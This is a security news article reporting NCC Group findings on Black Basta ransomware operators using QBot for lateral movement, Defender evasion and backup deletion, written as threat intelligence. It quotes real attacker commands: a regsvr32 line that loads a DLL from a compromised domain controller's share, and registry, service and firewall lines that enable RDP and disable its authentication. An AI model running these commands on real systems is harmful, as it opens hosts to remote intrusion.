Black Basta ransomware operators leverage QBot for lateral movements

Pierluigi Paganini June 07, 2022

The QBot malware operation has partnered with Black Basta ransomware group to target organizations worldwide.

Researchers from NCC Group spotted a new partnership in the threat landscape between the Black Basta ransomware group and the QBot malware operation.

Black Basta has been active since April 2022, like other ransomware operations, it implements a double-extortion attack model.  

black basta

QBot, aka Qakbot and Pinkslipbot, has been active since 2008, it is used by threat actors for collecting browsing data and banking credentials and other financial information from the victims.

Its modular structure allows operators to implement new features to extend their capabilities.

The Qbot malware operation had numerous collaborations in the past with other ransomware gangs, including ProLockEgregor, DoppelPaymer, and MegaCortex.

NCC Group researchers discovered the new partnership while investigating a recent incident, unlike past collaborations Black Basta gang is using QBot to spread laterally throughout the target network.

“Black Basta was observed using the following methods to laterally move throughout the network after their initial access had been gained:” reads analysis published by NCC:

  • PsExec.exe which was created in the C:\Windows\ folder.
  • Qakbot was leveraged to remotely create a temporary service on a target host which was configured to execute a Qakbot DLL using regsvr32.exe:
    • regsvr32.exe -s \\<IP address of compromised Domain Controller>\SYSVOL\<random string>.dll
  • RDP along with the deployment of a batch file called rdp.bat which contained command lines to enable RDP logons. This was used to allow the threat actor to establish remote desktop sessions on compromised hosts, even if RDP was disabled originally:
    • reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
    • net start MpsSvc
    • netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
    • reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f"

Experts reported that the threat actor used two main techniques to evade anti-virus detection by disabling Windows Defender.

The first technique leverages the batch script d.bat which was deployed locally on compromised hosts and executed a series of PowerShell commands. The second technique involved creating a GPO (Group Policy Object) on a compromised Domain Controller, which would push out a series of changes to the Windows Registry of domain-joined hosts.

The threat actors used Qakbot to maintain persistence on the victim’s network, experts also observed the use of Cobalt Strike beacons during the compromise.

The attackers, prior to the deployment of the ransomware, established RDP sessions to Hyper-V servers to modify configurations for the Veeam backup jobs and deleted the backups of the virtual machines used by the victims.

Then the attackers run a script to deliver the ransomware binary to the IP addresses contained within the file C:\Windows\pc_list.txt.

The researchers shared technical details about the ransomware along with the Indicators of Compromise (IoCs).

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Black Basta ransomware)

[adrotate banner=”5″]

[adrotate banner=”13″]



you might also like

leave a comment